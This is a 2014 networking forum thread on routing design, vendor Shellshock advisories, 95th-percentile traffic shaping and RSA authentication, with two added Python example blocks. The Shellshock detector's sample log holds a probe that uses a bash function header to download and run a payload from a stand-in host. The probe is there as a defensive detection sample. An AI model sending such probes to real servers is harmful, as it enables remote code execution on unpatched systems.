Ahdinko posted: Running a network of 25 sites on static routes sounds like it will be hell from an administrative point of view, especially when you add a new subnet/a line goes down/you open a new site. There are a lot of ways to design a network like that, but I'd budget for something that can at least do EIGRP stub in your remote sites like the 2960XR's (which seem to cost so much you might as well go for a 3750x)

They don't need a 1Gb connection, I had that wrong. We are doing 100Mb from the remote sites and 1Gb at the hubs, sorry. In your scenario those 10Mb lines were just internet connections, right? Hence the VPN? We are doing L2 connections; the bandwidth is because we are sending large amounts of data between sites for business functions (video and audio, it's TV related).

If I plan on using a dynamic routing protocol, I shouldn't need any full L3 devices at the remote sites, correct? Since they have their default gateway set to the state hub, as long as the state hubs do all the route storing/sharing then all the remote sites can stay out of the routing domain? Or do they need to be a part of it to advertise their directly connected routes?

whaam fucked around with this message at 11:56 on Sep 25, 2014
# ? Sep 25, 2014 11:51 |
|
|
You can put statics on your hub routers and then redistribute the statics into your IGP, if you like.
|
# ? Sep 25, 2014 16:34 |
|
Anyone found anything about whether Cisco gear is vulnerable to the Shellshock exploit?
|
# ? Sep 25, 2014 17:23 |
|
jwh posted:You can put statics on your hub routers and then redistribute the statics into your IGP, if you like. Ahh perfect that's what I was hoping, thanks.
|
# ? Sep 25, 2014 20:11 |
|
Slickdrac posted:Anyone found anything about whether the Shellshock exploit is vulnerable on Cisco gear? We are sweating it out too. It's too early to know yet. I haven't seen anything official from Cisco yet except an acknowledgement that they are checking.
|
# ? Sep 26, 2014 00:23 |
|
They really can't fly with that answer. Every other vendor we have in our environment has already identified which devices are vulnerable, which vectors are potentially open, and tossed patches over. Granted, most vendors likely already knew about this and were being gagged by 3 letter agencies. But even then, Cisco almost certainly should have known about it. They at least have the resources to ID things quicker than this. I'm already having to run a total outage, a mostly outage, and 30+ individual site outages tonight, I would have liked to not have to (potentially) do poo poo on the weekend for once.
|
# ? Sep 26, 2014 06:03 |
|
Since I had to go digging for it tonight, here's Juniper's response and risk assessment per-product. If anyone finds something relating to Force10 gear I'd appreciate a link.
|
# ? Sep 26, 2014 06:35 |
|
All Checkpoint firewalls as well are vulnerable. Though if you restrict your source IPs for management, you're okay. They have a patch out as well already.
|
# ? Sep 26, 2014 06:45 |
|
Slickdrac posted: They really can't fly with that answer. Every other vendor we have in our environment has already identified which devices are vulnerable, which vectors are potentially open, and tossed patches over. Granted, most vendors likely already knew about this and were being gagged by 3 letter agencies. But even then, Cisco almost certainly should have known about it. They at least have the resources to ID things quicker than this.

I'm still waiting for a release of IOS 15.3 that has the Heartbleed issue fixed.

edit: Cisco released 153-3.M4 today, 25 September, closing the Heartbleed bug. I expect 153-3.M5 for Shellshock around January 2015.
|
# ? Sep 26, 2014 07:44 |
|
Nobody exposes their management ports to the world anyway, right?
|
# ? Sep 26, 2014 08:42 |
|
^ That. As for a list of vulnerable Cisco products, wouldn't one be able to surmise which type of gear may be vulnerable by knowing if there's some Unix flavor underneath? IOS and IOS XR shouldn't be, but IOS XE (IOS running as a daemon on Linux) is likely to be?
|
# ? Sep 26, 2014 13:50 |
|
falz posted: ^ That.

IOS-XR is QNX under the hood, but the only shell I can find in QNX (on my 9k at least) is ksh. Apparently I don't have the right license to access the IOS-XE shell, but based on other people's observations of it, it uses bash as a shell, so it would be vulnerable (if you could find some way to get to it from the network).
|
# ? Sep 26, 2014 15:48 |
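The "some way to get to it from the network" in the post above is, in practice, a CGI-style front end that copies request headers into environment variables before spawning bash, so the probes show up in web logs with a header value that starts with the bash function-export prelude `() {`. The block below is an added example written for this thread, not code from any post or vendor advisory: it scans constructed Apache combined-format log lines for that prelude (the IPs, paths and payloads are made up) and runs the canonical local bash test. It assumes Python 3.7+ and that `bash`, if present, is on a standard PATH.

```python
"""Added example for this thread (not vendor code, not from any post):
spot Shellshock (CVE-2014-6271) probes in a web server log, and run the
canonical local test against whatever bash is on this box.

The log lines, IPs and paths below are constructed for this example.
"""
import re
import subprocess

# A header value that starts with "() {" is a bash exported-function
# definition. Nothing legitimate sends that; anchor at the start because
# bash only parses the prelude there.
SHELLSHOCK_RE = re.compile(r'^\s*\(\)\s*\{')

# One double-quoted field of an Apache "combined" log line; inner quotes
# are logged as \" so allow backslash escapes.
_Q = r'"((?:[^"\\]|\\.)*)"'
COMBINED_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + _Q + r' (\d{3}) (\S+) ' + _Q + ' ' + _Q + '$'
)

# Constructed sample log: one classic probe in User-Agent, one benign
# request, one CVE-2014-6278-style variant in Referer.
SAMPLE_LOG = r'''
203.0.113.7 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget http://203.0.113.7/x -O /tmp/x; sh /tmp/x\""
198.51.100.2 - - [25/Sep/2014:10:02:14 +0000] "GET /index.html HTTP/1.1" 200 2048 "http://example.com/" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [25/Sep/2014:10:03:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 0 "() { _; } >_[$($())] { echo vulnerable; }" "curl/7.35.0"
'''


def header_is_shellshock(value: str) -> bool:
    """True if a header value carries the Shellshock function prelude."""
    return SHELLSHOCK_RE.match(value) is not None


def scan_log(text: str):
    """Return (client_ip, header_name, value) for every probe found.

    Only Referer and User-Agent are visible in the combined format; a real
    deployment would also log Cookie and any custom headers, since any
    header that becomes an environment variable is a valid injection point.
    """
    hits = []
    for line in text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue
        ip, _ts, _req, _status, _bytes, referer, ua = m.groups()
        for name, value in (("Referer", referer), ("User-Agent", ua)):
            if header_is_shellshock(value):
                hits.append((ip, name, value))
    return hits


def local_bash_vulnerable():
    """Run the canonical CVE-2014-6271 check against the local bash.

    Returns True if the command trailing the exported function executed,
    False if bash only ran the requested command, None if there is no
    bash on PATH (an IOS-XR box with only ksh would land here).
    """
    env = {"x": "() { :;}; echo vulnerable", "PATH": "/usr/local/bin:/usr/bin:/bin"}
    try:
        proc = subprocess.run(["bash", "-c", "echo test"], env=env,
                              capture_output=True, text=True, timeout=5)
    except FileNotFoundError:
        return None
    return "vulnerable" in proc.stdout


if __name__ == "__main__":
    for ip, name, value in scan_log(SAMPLE_LOG):
        print(f"{ip} sent Shellshock probe in {name}: {value[:60]}")
    print("local bash vulnerable:", local_bash_vulnerable())
```

The regex is deliberately anchored: bash only treats the value as a function definition when `() {` is the first thing in it, so matching the prelude anywhere in a header would mostly flag people pasting shell snippets into search boxes. The local check is the same one-liner the advisories quote; on a patched bash the output is just `test`, and a partially patched bash may also warn about the ignored function definition on stderr.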
|
F5 put this out:
http://support.f5.com/kb/en-us/solutions/public/15000/600/sol15629.html
https://devcentral.f5.com/articles/shellshock-mitigation-with-big-ip-irules
|
# ? Sep 26, 2014 15:54 |
|
For Shellshock:

quote: The following Cisco products are currently under investigation:

At least our PIX's are safe!

Ahdinko fucked around with this message at 17:22 on Sep 26, 2014
# ? Sep 26, 2014 17:11 |
|
Palo Alto released a statement today as well, though it's only vulnerable if you allow anyone to authenticate to PAN-OS via SSH.
|
# ? Sep 26, 2014 20:30 |
|
Here's some advisories I've collected to save some time:

Blue Coat: https://kb.bluecoat.com/index?page=content&id=SA82&actp=RSS
Check Point: https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk102673
Cisco: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
Polycom: http://supportdocs.polycom.com/PolycomService/support/global/documents/support/documentation/Security_Bulletin_bash_shellshocked_v1_0.pdf
Riverbed: https://supportkb.riverbed.com/support/index?page=content&id=S24997

Also this guy is posting advisory updates for several vendors: http://www.mnemonic.no/en/Andre-sprak/English/Blog/Status-on-products-versus-vulnerability-in-Bash-CVE-2014-6271/
|
# ? Sep 26, 2014 20:41 |
|
Docjowles posted: If anyone finds something relating to Force10 gear I'd appreciate a link.

Force10 is fine - something official is being worked on at the moment.
|
# ? Sep 27, 2014 02:28 |
|
jwh posted: Palo Alto released a statement today as well, though it's only vulnerable if you allow anyone to authenticate to PANOS via ssh.

Same thing as A10s.
|
# ? Sep 27, 2014 07:04 |
LOL Cisco

# ? Sep 27, 2014 19:28
|
z0rlandi viSSer posted: LOL

Not really. A very small subset of products is vulnerable - less so than Heartbleed.
|
# ? Sep 30, 2014 00:41 |
|
Some very important ones, though. And the "owned" part will be us waiting around trying to see when or if a patch will be available (on some products, no, you have to upgrade instead). Even if bash is vulnerable to exploit, again, you have to get somewhere where you can exploit it, and under most circumstances in a wrapped Tomcat application or their dummy "shells" they give you, I would hope that opportunity isn't there for anyone to fudge with it, so it's still something to be aware of.
|
# ? Sep 30, 2014 22:41 |
|
Traffic shaping question. We have a 20Mbps link to our ISP, burstable to 100Mbps. We're billed at 95th percentile. We recently ran into a large overage, as our outbound 95th usage was 56Mbps for the month. We want to shape the traffic so that we can avoid overages like this. If I use 'shape average', I know I can limit it to, say, 20Mbps and know we'll never have an overage - but then we lose bursts. If I do 'shape peak', I can throttle the bursts, but not guarantee that we'll go over. Is there middle ground, or a formula I can use to figure out the best values for peak shaping? This is on a 1941 router.
|
# ? Oct 2, 2014 19:01 |
|
Anyone have an old ACS 4.2.0 appliance DVD laying around? We need to do a password recovery for the CLI, which you apparently need the disc for, but can't find the thing. Or if anyone knows where to get one fairly inexpensively that'd work too.
|
# ? Oct 3, 2014 16:40 |
|
Richard Noggin posted: Traffic shaping question. We have a 20Mbps link to our ISP, burstable to 100Mbps. We're billed at 95th percentile. We recently ran into a large overage, as our outbound 95th usage was 56Mbps for the month. We want to shape the traffic so that we can avoid overages like this. If I use 'shape average', I know I can limit it to, say, 20Mbps and know we'll never have an overage - but then we lose bursts. If I do 'shape peak', I can throttle the bursts, but not guarantee that we'll go over. Is there middle ground, or a formula I can use to figure out the best values for peak shaping? This is on a 1941 router.

Not really, no. Shape peak will allow you to use the bandwidth if it's available, and because this is likely an ethernet interface, there's no true back pressure.
|
# ? Oct 3, 2014 17:27 |
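The "middle ground" being asked about in the exchange above is really a question about how 95th-percentile billing works: the provider discards the top 5% of the month's samples, so the constraint is not "never exceed the commit" but "exceed it in fewer than 5% of the intervals". The block below is an added example written for this thread, not something from the posts or from IOS: it computes the billing percentile and the free burst headroom, builds a constructed month of traffic, and models a shaper that spends that headroom and then clamps. It assumes 5-minute sampling and the discard-top-5%-then-bill-the-next-sample convention (one common scheme; contracts differ). Shape average and shape peak on the router act per interval and cannot see month-to-date history, which is why the model is a controller on top of the shaper rather than an IOS command.

```python
"""Added example for the 95th-percentile shaping question (not from the
thread, not IOS code): how much bursting a 95th-percentile bill tolerates
and what a shaper would have to do with that headroom.

Assumptions, labelled as such: the ISP samples the interface every 5
minutes and bills the highest sample left after discarding the top 5%
of the month's samples (one common convention; check your contract).
The traffic samples are constructed.
"""

COMMIT_MBPS = 20.0
INTERVAL_MIN = 5


def percentile_95(samples):
    """Billing-style 95th: sort high to low, discard the top 5%, bill the next."""
    if not samples:
        raise ValueError("no samples")
    ordered = sorted(samples, reverse=True)
    drop = len(ordered) * 5 // 100      # integer maths: 8640 samples -> 432
    return ordered[drop]


def free_burst_intervals(days_in_month):
    """Samples per month that may exceed the commit without touching the bill."""
    n = days_in_month * 24 * 60 // INTERVAL_MIN
    return n * 5 // 100


def build_month(days=30, base=15.0, burst=60.0, burst_start=100, burst_len=36):
    """Constructed demand: flat `base` Mb/s with one 3-hour `burst` per day."""
    per_day = 24 * 60 // INTERVAL_MIN
    samples = []
    for _ in range(days):
        for i in range(per_day):
            in_burst = burst_start <= i < burst_start + burst_len
            samples.append(burst if in_burst else base)
    return samples


def shape_with_budget(demand, commit=COMMIT_MBPS, budget=None):
    """Model of the 'middle ground' the poster asked for.

    Let a sample exceed `commit` only while the month's burst budget lasts,
    then clamp to `commit`. This is a model, not an IOS feature: 'shape
    peak' and 'shape average' act per interval and cannot see the
    month-to-date history, so on the router the choice is really
    'shape average' at the commit, or an external controller that
    reprograms the shaper once the budget is spent.
    """
    if budget is None:
        budget = len(demand) * 5 // 100 - 1   # one inside the discard window, for margin
    shaped = []
    for d in demand:
        if d > commit and budget > 0:
            shaped.append(d)
            budget -= 1
        else:
            shaped.append(min(d, commit))
    return shaped


if __name__ == "__main__":
    demand = build_month()
    hours = free_burst_intervals(30) * INTERVAL_MIN / 60
    print(f"free burst per 30-day month: {hours:.0f} hours")
    print(f"unshaped 95th: {percentile_95(demand)} Mb/s")
    print(f"budgeted shaper 95th: {percentile_95(shape_with_budget(demand))} Mb/s")
```

With a 30-day month that is 432 five-minute samples, or 36 hours, of free bursting. The constructed demand bursts for 3 hours every day (90 hours), so unshaped it bills at the burst rate; the budgeted model spends the first 431 burst intervals and clamps the rest, and the 95th lands back on the commit. The same arithmetic also tells you how badly the month in the post went: a 95th of 56 Mb/s means more than 5% of the samples were at or above 56, not that the link merely touched it.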
|
Panthrax posted:Anyone have an old ACS 4.2.0 appliance DVD laying around? We need to do a password recovery for the CLI, which you apparently need the disc for, but can't find the thing. Or if anyone knows where to get one fairly inexpensively that'd work too. I'll take a look Monday.
|
# ? Oct 4, 2014 01:30 |
|
Does anyone have a recommendation for any device (preferably a full firewall) that has full RSA integration? That can pop up a splash page with login and things for next pin, reset pin, create pin, etc.?
|
# ? Oct 6, 2014 16:13 |
|
I vaguely recall the RSA appliance itself has a web portal for such purposes built in.
|
# ? Oct 6, 2014 18:13 |
|
inignot posted:I vaguely recall the RSA appliance itself has a web portal for such purposes built in. Correct, the RSA software/appliance has a Self-Service console to allow the user to resync, reset, etc. Slickdrac posted:Does anyone have a recommendation for any device (preferably a full firewall) that has full RSA integration? That can pop up a splash page with login and things for next pin, reset pin, create pin, etc.? Are you looking to use RSA for management of the firewall or authenticate VPN connections?
|
# ? Oct 6, 2014 18:23 |
|
H.R. Paperstacks posted:Are you looking to use RSA for management of the firewall or authenticate VPN connections? Auth for inbound connections to private public facing IPs for Web, FTP, SSH, etc. that doesn't go via our VPN. Firewall functionality is more a perk as we need a new pair of Non Checkpoint firewalls to replace the CPs in that zone.
|
# ? Oct 6, 2014 20:37 |
|
Slickdrac posted:Auth for inbound connections to private public facing IPs for Web, FTP, SSH, etc. that doesn't go via our VPN. Firewall functionality is more a perk as we need a new pair of Non Checkpoint firewalls to replace the CPs in that zone. Out of curiosity - why replace Check point?
|
# ? Oct 6, 2014 20:39 |
|
Slickdrac posted:Auth for inbound connections to private public facing IPs for Web, FTP, SSH, etc. that doesn't go via our VPN. Firewall functionality is more a perk as we need a new pair of Non Checkpoint firewalls to replace the CPs in that zone. For instances like that, you would install the RSA agents on the systems, not the firewall. The firewall would just handle the standard src/dst filtering, the actual authentication is going to be handled by the system itself.
|
# ? Oct 6, 2014 20:53 |
|
ior posted:Out of curiosity - why replace Check point? That's a much nicer way of asking that than I did. It probably would have gotten about the same amount of non answer that I got though. H.R. Paperstacks posted:For instances like that, you would install the RSA agents on the systems, not the firewall. The firewall would just handle the standard src/dst filtering, the actual authentication is going to be handled by the system itself. We must proxy it through a "Pane of glass"
|
# ? Oct 6, 2014 20:55 |
|
Slickdrac posted:We must proxy it through a "Pane of glass" You want a remote client to SSH to an IP (is it a NAT'd Public --> RFC1918 IP?), but you first want the firewall/<device> to terminate the SSH session and perform RSA Two-Factor Authentication before passing the SSH session to the destination IP? How is the client expected to authenticate to the destination IP?
|
# ? Oct 6, 2014 22:59 |
|
Auth at the device and then something with it, the RSA internal service, and Ping Federate are all working together or something to pass the authed user into the destination. I'm not actually the one running the whole idea, just got asked if I could find out about such a firewall device. Right now these pages are authing inside and are privatized by white listing IPs, which isn't really ideal.
|
# ? Oct 7, 2014 10:52 |
|
Slickdrac posted: Auth at the device and then something with it, the RSA internal service, and Ping Federate are all working together or something to pass the authed user into the destination. I'm not actually the one running the whole idea, just got asked if I could find out about such a firewall device. Right now these pages are authing inside and are privatized by white listing IPs, which isn't really ideal.

What you are wanting to do really isn't possible with a firewall since you do not terminate sessions to it other than transparently doing NAT/PAT and some SSL proxying. Firewall integration with an RSA appliance is mainly for authenticating management connections on the control plane, not client connections flowing through it. RSA integration for SSH/HTTP/HTTPS is all handled by an agent service that runs on the server itself. You could look into something more along the lines of a load balancer, like an F5 BIG-IP, but even then, it will only be good for MITM'ing an HTTP/HTTPS request.
|
# ? Oct 7, 2014 14:32 |
|
Funny, that's exactly who they were calling this morning. I'm trying to just stay out of the way of this now so I don't end up in the blast zone when this idea blows up.
|
# ? Oct 7, 2014 15:48 |
|
Is anyone else here a UC guy, primarily Cisco but ... Lync/Polycom interop as well? This stuff is a massive pain in the rear end to wrap around which product almost sort of works for a bunch of money, and which are terrible.
|
# ? Oct 9, 2014 00:24 |
|
H.R. Paperstacks posted:What you are wanting to do really isn't possible with a firewall since you do not terminate sessions to it other than transparently doing NAT/PAT and some SSL Proxying. Firewall integration with an RSA appliance is mainly for authenticating management connections on the control plane, not client connections flowing through it. RSA integration for SSH/HTTP/HTTPS is all handled by a agent service that runs on the server itself. This isn't strictly true. You can use RSA for auth in an RAVPN scenario. Also you could do what he is asking by using the auth proxy feature on ASA with a dash of the IDFW stuff. We did that with the client authenticating to a webportal hosted by the ASA. AD group membership would determine the ACL applied to the session. No reason I can think of that it wouldn't work just fine with RSA/SecurID integration. Unless I'm completely blowing it on what he's trying to do.
|
# ? Oct 10, 2014 01:30 |
|
Tremblay posted:This isn't strictly true. You can use RSA for auth in an RAVPN scenario. Also you could do what he is asking by using the auth proxy feature on ASA with a dash of the IDFW stuff. We did that with the client authenticating to a webportal hosted by the ASA. AD group membership would determine the ACL applied to the session. No reason I can think of that it wouldn't work just fine with RSA/SecurID integration. Unless I'm completely blowing it on what he's trying to do. Yeah, I could be misunderstanding him as well, but to me it sounds like he wants to perform authentication at the firewall, and if successful, be forwarded on to the actual system hosting the destination service. Are the services behind setup without any authentication mechanism of their own? I could see that with HTTP/HTTPS but not SSH/FTP like he mentions, since you have to provide UN/PW/keys for authentication on the system hosting the actual destination service as well.
|
# ? Oct 10, 2014 13:59 |
|
I've been tasked to replace an old Cisco 3500XL-series gigabit switch, and seeing as I've never worked with something of this magnitude I figured I could ask in here. What would be viable options to look into? In terms of budget, I don't really have a limit but I'm thinking something in the $750-1500 range would be feasible.
|
|
# ? Oct 10, 2014 16:44 |